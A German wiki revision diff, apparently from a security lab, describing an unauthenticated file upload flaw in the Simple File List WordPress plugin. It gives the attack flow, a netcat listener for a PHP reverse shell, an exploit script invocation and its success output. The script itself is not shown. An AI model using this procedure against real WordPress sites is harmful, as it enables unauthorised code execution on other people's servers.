Unauthenticated Arbitrary File Upload: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→Usage) |
|||
| Zeile 15: | Zeile 15: | ||
==Usage== | ==Usage== | ||
| − | *python3 script.py http://10. | + | *python3 script.py http://10.0.10.109 |
[ ] File 3012.png generated with password: 3bde8f1c67657e9b4c7119ee8beae4c4 | [ ] File 3012.png generated with password: 3bde8f1c67657e9b4c7119ee8beae4c4 | ||
[ ] File uploaded at http://10.85.70.213/wp-content/uploads/simple-file-list/3012.png | [ ] File uploaded at http://10.85.70.213/wp-content/uploads/simple-file-list/3012.png | ||
| Zeile 21: | Zeile 21: | ||
[+] Exploit seem to work. | [+] Exploit seem to work. | ||
[*] Confirmning ... | [*] Confirmning ... | ||
| + | |||
=Link= | =Link= | ||
https://wpscan.com/vulnerability/10132 | https://wpscan.com/vulnerability/10132 | ||
Version vom 16. Mai 2022, 14:12 Uhr
Arbitrary file upload in Simple File List plugin for WordPress
Schachstelle
- Die Schwachstelle besteht aufgrund einer unzureichenden Validierung von Dateien während des Datei-Uploads.
- Ein entfernter Angreifer kann eine Datei hochladen, die PHP-Code enthält, aber eine png-Bilddateierweiterung hat.
- Dannach wird eine zweite Anfrage gesendet, um die png-Datei in eine PHP-Datei zu verschieben.
- Im Anschluss wird die PHP-Datei aufgerufen und ausgeführt.
Ablauf
Python3 Script zum Payload Hochladen
PHP Reverse Shell
Angreifer
- netcat -lp 9999
Usage
- python3 script.py http://10.0.10.109
[ ] File 3012.png generated with password: 3bde8f1c67657e9b4c7119ee8beae4c4 [ ] File uploaded at http://10.85.70.213/wp-content/uploads/simple-file-list/3012.png [ ] File moved to http://10.85.70.213/wp-content/uploads/simple-file-list/3012.php [+] Exploit seem to work. [*] Confirmning ...
